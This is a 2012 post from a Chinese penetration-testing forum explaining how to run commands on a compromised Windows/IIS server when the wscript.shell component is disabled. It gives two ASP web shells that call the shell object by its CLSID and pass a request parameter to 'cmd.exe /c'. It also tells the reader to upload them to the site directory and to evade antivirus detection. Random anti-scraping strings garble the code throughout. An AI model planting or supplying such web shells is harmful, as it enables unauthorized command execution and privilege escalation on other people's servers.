中国网络渗透测试联盟

标题: 没有wscript.shell组件提权方法 [打印本页]

作者: admin 时间: 2012-10-21 09:08
标题: 没有wscript.shell组件提权方法

可能有很多人，看到关闭了wscript.shell,就感觉没提权的希望了。就会放弃。- S. N9 G. m5 S
一般当闭上面组件时，你上传cmd.exe到上面去是运行不了命令的。运行时会说出错。# N; C: j2 ^6 _. J
要想让运行命令可以试试这种方法，成功率为五五之数。
* W3 j& A) Y! A6 s1 k
把下面代码复制：: r6 u6 ]6 y1 S/ r1 E$ }
<%
" ~$ |9 p* ?* V# Z$ \) D* c; _
end if
& \ Q( u' G# I
response.write(”")1 O+ j \+ q9 |4 q
On Error Resume
4 ]+ W' D$ ?& y. e5 x5 x- c& `( i7 }
Next
0 b+ G& \+ C1 M. @ Z
response.write oScriptlhn.exec(”cmd.exe /c” & 9 ~% x2 q/ y) K. D5 \
request(”c”)).stdout.readall S: z7 S# F2 Z) [5 z
response.write(”"): o; r( _/ j3 H* _9 x' z, ^' S
response.write(”")7 `; p! S3 Q* L- d6 Q9 |
response.write(”: y: n* y0 d& v
“)
8 B8 D$ W# w3 w2 |/ Q9 }3 z
response.write(”")
" b2 \# }) g: |9 \
%>, o$ n- y7 f5 B) Q
保存为一个asp文件，然后传到网站目录上去
) h1 O' ^ B1 D q
运行的时候可能会出现两个问题，第一是运行了为什么运行不了命令，这个你可以试着再上传个cmd.exe然后把路径写入上面代码。% t0 Y" Z5 d: W* H+ p3 V+ J
我用此成功运行过cacls命令。
* \ y* P3 v0 J7 J; X5 f4 a
第二那就是运行时出错，可能限制某些代码执行
: F0 I) H9 j0 U/ |% P4 V
无wscript.shell组件提权又一个方法3 x' m9 b0 n4 y# d
<object runat=server id=oScriptlhn scope=page % u+ i6 U! F2 [) f; d8 w2 ~- w
' f2 x8 G+ [. g# l @
classid=”clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8″></object>
- k+ r2 P. {! d3 O/ [2 F1 }6 o
<%if err then%>
$ ` e0 M: I) C+ V/ u# @5 _8 J
<object runat=server id=oScriptlhn scope=page
! ?. h; }; P6 |) W# M- Y
5 M( S/ |- y) \$ o' ?
classid=”clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B”></object> r/ R2 O# U9 }2 P/ R3 c
<% 2 C; F, C, U) i
end if / i1 P* ~7 z8 ^
response.write(”<textarea readonly cols=80
% K( ~' j( @" R' o( \4 v- {
! m; x% c: E* Z' W
rows=20>”)
# W+ X8 G6 G, Y+ f2 ~
On Error Resume Next $ e( H! ~5 i9 k7 y) w8 F
response.write 3 z% Y7 N" a5 u9 s% R
8 L: u; _$ d0 S$ ?! D
oScriptlhn.exec(”cmd.exe /c” & request(”c”)).stdout.readall
* k4 h8 D4 r' z+ }4 s& z
response.write(”</textarea>”) ( ^8 r# J- f" x4 K
response.write(”<form ! Q0 K/ O7 z0 ^4 n
# A! p2 K4 l. |) ]. q2 Z
method=’post’>”)
$ W8 A' i- y7 E& j- F6 p
response.write(”<input type=text name=’c'
9 `. o& R0 ?4 g+ @3 ~1 r) \
4 c2 X: ?+ @1 Y$ Y4 M, o* q
size=60><br>”)
) {# [; g K' g! I
response.write(”<input type=submit
' N/ d! V8 l, k4 }1 U6 Z
0 E4 z0 `, Z, u; N$ ?; J
value=’执行’></form>”)
* L ?2 h$ `/ k: S# s$ }2 [4 {
%>( O N) N1 E. y( @
保存为ASP，此代码可能被杀，请注意免杀。0 f* j/ C* B1 W! w: Z, `" G
原理：有些人把wscript.shell改名了,但是clsid没有变，所以调用这个clsid就等于调用ws组建6 q( A @* f& h9 u! D

复制代码

欢迎光临中国网络渗透测试联盟 (https://cobjon.com/)